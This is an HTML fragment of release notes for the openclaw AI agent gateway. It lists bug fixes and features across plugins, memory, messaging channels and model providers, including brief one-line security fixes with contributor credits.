<li>CLI/plugins: use plugin metadata snapshots for install slot selection and add opt-in plugin lifecycle timing traces, so plugin install avoids runtime-loading the plugin registry for metadata-only decisions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(plugins): restrict bundled plugin dir resolution to trusted package roots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340652676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73275" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73275/hovercard" href="https://github.com/openclaw/openclaw/pull/73275">#73275</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): prevent workspace PATH injection via service env and trash helpers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340617524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73264" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73264/hovercard" href="https://github.com/openclaw/openclaw/pull/73264">#73264</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory: allow <code>allowedChatTypes</code> to include explicit portal/webchat sessions and classify <code>agent:...:explicit:...</code> session keys before opaque session ids can shadow the chat type. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252129588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65775" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65775/hovercard" href="https://github.com/openclaw/openclaw/issues/65775">#65775</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259069037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66285/hovercard" href="https://github.com/openclaw/openclaw/pull/66285">#66285</a>) Thanks @Lidang-Jiang.</li>
<li>Active Memory: allow the hidden recall sub-agent to use both <code>memory_recall</code> and the legacy <code>memory_search</code>/<code>memory_get</code> memory tool contract, so bundled <code>memory-lancedb</code> recall works without breaking the default <code>memory-core</code> path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342562900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73502" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73502/hovercard" href="https://github.com/openclaw/openclaw/issues/73502">#73502</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343523222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73584" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73584/hovercard" href="https://github.com/openclaw/openclaw/pull/73584">#73584</a>) Thanks @Takhoffman.</li>
<li>fix(device-pairing): validate callerScopes against resolved token scopes on repair [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337345824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72925" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72925/hovercard" href="https://github.com/openclaw/openclaw/pull/72925">#72925</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory docs: document the <code>cacheTtlMs</code> 1000-120000 ms range and 15000 ms default so setup snippets do not lead users past the schema limit. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251274400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65708/hovercard" href="https://github.com/openclaw/openclaw/issues/65708">#65708</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251576914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65737/hovercard" href="https://github.com/openclaw/openclaw/pull/65737">#65737</a>) Thanks @WuKongAI-CMU.</li>
<li>fix(agents): canonicalize provider aliases in byProvider tool policy lookup [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337295525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72917" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72917/hovercard" href="https://github.com/openclaw/openclaw/pull/72917">#72917</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): block npm_execpath injection from workspace .env [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340604156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73262/hovercard" href="https://github.com/openclaw/openclaw/pull/73262">#73262</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Tools/web_fetch: decode response bodies from raw bytes using declared HTTP, XML, or HTML meta charsets before extraction, so Shift_JIS and other legacy-charset pages no longer return mojibake. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337284956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72916/hovercard" href="https://github.com/openclaw/openclaw/issues/72916">#72916</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Active Memory: skip payload-less <code>memory_search</code> transcript tool results when building debug telemetry, so newer empty entries no longer hide the latest useful debug payload. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289720192" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68773/hovercard" href="https://github.com/openclaw/openclaw/pull/68773">#68773</a>) Thanks @SimbaKingjoe.</li>
<li>Active Memory: keep recall setup time from consuming the configured model timeout while giving the hook runner an explicit bounded budget for the plugin, so slow embedded-run setup no longer causes immediate recall timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333274016" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72606/hovercard" href="https://github.com/openclaw/openclaw/issues/72606">#72606</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333343055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72620" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72620/hovercard" href="https://github.com/openclaw/openclaw/pull/72620">#72620</a>) Thanks @hyspacex.</li>
<li>Channels/Discord: bound message read/search REST calls, route those actions through Gateway execution, and fall back to <code>CommandTargetSessionKey</code> for inbound hook session keys so Discord reads do not hang and hooks still fire when <code>SessionKey</code> is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341806261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73431" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73431/hovercard" href="https://github.com/openclaw/openclaw/issues/73431">#73431</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342707124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73521" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73521/hovercard" href="https://github.com/openclaw/openclaw/pull/73521">#73521</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/media: auto-enable provider plugins referenced by <code>agents.defaults.imageGenerationModel</code>, <code>videoGenerationModel</code>, and <code>musicGenerationModel</code> primary/fallback refs, so configured Google and MiniMax media providers do not stay disabled behind a restrictive plugin allowlist. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-core/dreaming: retry managed dreaming cron registration after startup when the cron service is not reachable yet, so the scheduled Memory Dreaming Promotion sweep recovers without waiting for heartbeat traffic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336307968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72841/hovercard" href="https://github.com/openclaw/openclaw/issues/72841">#72841</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Acpx/runtime: validate the runtime session mode at the <code>AcpxRuntime.ensureSession</code> wrapper boundary so callers that pass anything other than <code>persistent</code> or <code>oneshot</code> get a clear <code>ACP_INVALID_RUNTIME_OPTION</code> error instead of silently round-tripping through the encoded handle as a default <code>persistent</code> mode and later throwing <code>SessionResumeRequiredError</code>. Investigation context: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339298543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73071/hovercard" href="https://github.com/openclaw/openclaw/issues/73071">#73071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342946140" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73548/hovercard" href="https://github.com/openclaw/openclaw/pull/73548">#73548</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/infer: keep web-search fallback on missing provider API keys, preserve structured validation errors from the selected provider, and let per-request image describe prompts override configured media-entry prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226252002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63263" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63263/hovercard" href="https://github.com/openclaw/openclaw/pull/63263">#63263</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Chat commands: include configured model-catalog reasoning metadata when building <code>/think</code> argument menus so Ollama Cloud and other provider-owned reasoning models show supported levels instead of only <code>off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342653082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73515/hovercard" href="https://github.com/openclaw/openclaw/issues/73515">#73515</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343323395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73568/hovercard" href="https://github.com/openclaw/openclaw/pull/73568">#73568</a>. Thanks @danielzinhu99 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Channels/Telegram: suppress generic tool-progress chatter when preview streaming is off, so non-streaming Telegram turns only deliver final replies while approvals, media, and errors still route normally. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331988059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72363" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72363/hovercard" href="https://github.com/openclaw/openclaw/issues/72363">#72363</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332559274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72482" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72482/hovercard" href="https://github.com/openclaw/openclaw/pull/72482">#72482</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and @SweetSophia.</li>
<li>CLI/model probes: add repeatable image <code>--file</code> inputs to <code>infer model run</code> for local and gateway multimodal model smokes, so vision models such as Ollama Qwen VL and Gemini can be tested through the raw model-probe surface. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>CLI/model probes: request trusted operator scope for <code>infer model run --gateway --model &lt;provider/model&gt;</code> so Gateway raw model smokes can use one-off provider/model overrides instead of being rejected before provider auth resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345598480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73759" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73759/hovercard" href="https://github.com/openclaw/openclaw/issues/73759">#73759</a>. Thanks @chrislro.</li>
<li>CLI/image describe: pass <code>--prompt</code> and <code>--timeout-ms</code> through <code>infer image describe</code> and <code>describe-many</code>, so custom vision instructions and slow local model budgets reach media-understanding providers such as Ollama, OpenAI, Google, and OpenRouter. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>Model selection: include the rejected provider/model ref and allowlist recovery hint when a stored session override is cleared, so local model selections such as Gemma GGUF variants do not fall back to the default with a generic message. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322522808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71069/hovercard" href="https://github.com/openclaw/openclaw/issues/71069">#71069</a>. Thanks @CyberRaccoonTeam.</li>
<li>OpenAI-compatible providers: drop malformed event-only or blank-data SSE frames before the OpenAI SDK stream parser sees them, so proxies that split <code>event:</code> from <code>data:</code> no longer crash streaming runs with <code>Unexpected end of JSON input</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120148034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52802" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52802/hovercard" href="https://github.com/openclaw/openclaw/issues/52802">#52802</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway/OpenAI-compatible streaming: strip <code>&lt;final&gt;</code> tags split across streamed model deltas before they reach SSE clients, so <code>/v1/chat/completions</code> no longer emits tag remnants or drops content when final-answer wrappers cross chunk boundaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63325" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63325/hovercard" href="https://github.com/openclaw/openclaw/issues/63325">#63325</a>. Thanks @tzwickl.</li>
<li>Ollama: resolve explicitly selected signed-in <code>:cloud</code> models through <code>/api/show</code> when <code>/api/tags</code> omits them, so working models such as <code>gemini-3-flash-preview:cloud</code> and <code>deepseek-v4-pro:cloud</code> do not fail dynamic model resolution before the native <code>/api/chat</code> transport runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347240832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73909" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73909/hovercard" href="https://github.com/openclaw/openclaw/issues/73909">#73909</a>. Thanks @chtse53.</li>
<li>Discord/exec approvals: keep the local <code>/approve</code> prompt when no native Discord approval runtime is active, and send a manual fallback notice when native approval delivery reaches no targets, so failed DM cards no longer leave approval turns silent or dependent on model-written shell commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347379791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73954" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73954/hovercard" href="https://github.com/openclaw/openclaw/issues/73954">#73954</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347582133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74027" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74027/hovercard" href="https://github.com/openclaw/openclaw/pull/74027">#74027</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Local model prompt caching: keep stable Project Context above volatile channel/session prompt guidance and stop embedding current channel names in the message tool description, so Ollama, MLX, llama.cpp, and other prefix-cache backends avoid avoidable full prompt reprocessing across channel turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042157634" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40256/hovercard" href="https://github.com/openclaw/openclaw/issues/40256">#40256</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042278613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40296/hovercard" href="https://github.com/openclaw/openclaw/pull/40296">#40296</a>. Thanks @rhclaw and @sriram369.</li>
<li>Gateway/OpenAI-compatible API: guard provider policy lookup against runtime providers with non-array <code>models</code> values, so <code>/v1/chat/completions</code> no longer fails with <code>provider?.models?.some is not a function</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264109417" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66744/hovercard" href="https://github.com/openclaw/openclaw/issues/66744">#66744</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264303605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66761/hovercard" href="https://github.com/openclaw/openclaw/pull/66761">#66761</a>. Thanks @MightyMoud, @MukundaKatta.</li>
<li>WhatsApp/Web: pass explicit Baileys socket timings into every WhatsApp Web socket and expose <code>web.whatsapp.*</code> keepalive, connect, and query timeout settings so unstable networks can avoid repeated 408 disconnect and opening-handshake timeout loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159428566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56365/hovercard" href="https://github.com/openclaw/openclaw/issues/56365">#56365</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343447305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73580" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73580/hovercard" href="https://github.com/openclaw/openclaw/pull/73580">#73580</a>) Thanks @velvet-shark.</li>
<li>WhatsApp/Web: recover recently active listeners when a post-408 reconnect keeps receiving transport frames but stops delivering app messages, while keeping group metadata fallback off Baileys sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233698306" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63855/hovercard" href="https://github.com/openclaw/openclaw/issues/63855">#63855</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265721576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66920/hovercard" href="https://github.com/openclaw/openclaw/issues/66920">#66920</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887700676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/7433" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/7433/hovercard" href="https://github.com/openclaw/openclaw/issues/7433">#7433</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280282270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67986/hovercard" href="https://github.com/openclaw/openclaw/issues/67986">#67986</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319778979" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70856" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70856/hovercard" href="https://github.com/openclaw/openclaw/issues/70856">#70856</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197893841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60007" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60007/hovercard" href="https://github.com/openclaw/openclaw/pull/60007">#60007</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333345205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72621/hovercard" href="https://github.com/openclaw/openclaw/pull/72621">#72621</a>. Thanks @legonhilltech-jpg, @octopuslabs-fl, @Kanorin-chan, and @stuswan.</li>
<li>Channels/Telegram: persist native command metadata on target sessions so topic, helper, and ACP-bound slash commands keep their session metadata attached to the routed conversation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168079108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57548/hovercard" href="https://github.com/openclaw/openclaw/pull/57548">#57548</a>) Thanks @GaosCode.</li>
<li>Channels/native commands: keep validated native slash command replies visible in group chats while preserving explicit owner allowlists for command authorization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344709307" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73672" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73672/hovercard" href="https://github.com/openclaw/openclaw/pull/73672">#73672</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Pairing/doctor: bootstrap <code>commands.ownerAllowFrom</code> from the first approved DM pairing when no command owner exists, and have doctor explain missing owners so privileged slash commands are not accidentally unusable after onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Telegram/exec: infer native exec approvers from <code>commands.ownerAllowFrom</code> and auto-enable the Telegram approval client when an owner is resolvable, so owner-only commands such as <code>/diagnostics</code> can be approved in Telegram without duplicate per-channel approver config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Auto-reply/session: carry the tail of user/assistant turns into the freshly-rotated transcript on silent in-reply session resets (compaction failure, role-ordering conflict) so direct-chat continuity survives the rebind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319746928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70853/hovercard" href="https://github.com/openclaw/openclaw/issues/70853">#70853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320196607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70898" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70898/hovercard" href="https://github.com/openclaw/openclaw/pull/70898">#70898</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Skills: load grouped skill directories such as <code>skills/&lt;group&gt;/&lt;skill&gt;/SKILL.md</code> from configured skill roots while keeping grouped discovery capped for large directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163525640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56915/hovercard" href="https://github.com/openclaw/openclaw/issues/56915">#56915</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332799995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72534" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72534/hovercard" href="https://github.com/openclaw/openclaw/pull/72534">#72534</a>) Thanks @ottodeng, @MoerAI, and @i010542.</li>
<li>Config: skip malformed non-string <code>env.vars</code> entries before env-reference checks, so config loading no longer crashes on JSON values like numbers or booleans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053205994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42402" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42402/hovercard" href="https://github.com/openclaw/openclaw/pull/42402">#42402</a>) Thanks @MiltonHeYan.</li>
<li>Docker Compose: default missing config and workspace bind mounts to <code>${HOME:-/tmp}/.openclaw</code> so manual compose runs do not create invalid empty-source volume specs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241483820" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64485/hovercard" href="https://github.com/openclaw/openclaw/pull/64485">#64485</a>) Thanks @jlapenna.</li>
<li>Agents/context engines: preserve the child agent's configured <code>agentDir</code> when subagent cleanup re-resolves a context engine, so <code>onSubagentEnded</code> hooks keep operating on the correct per-agent state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269702327" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67243" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67243/hovercard" href="https://github.com/openclaw/openclaw/pull/67243">#67243</a>) Thanks @jarimustonen.</li>
<li>Channels/WhatsApp: restrict pairing verification replies to real inbound user content, preventing unsolicited prompts from receipts, typing indicators, presence updates, and other non-message Baileys upserts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346092528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73797/hovercard" href="https://github.com/openclaw/openclaw/issues/73797">#73797</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346437717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73823" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73823/hovercard" href="https://github.com/openclaw/openclaw/pull/73823">#73823</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
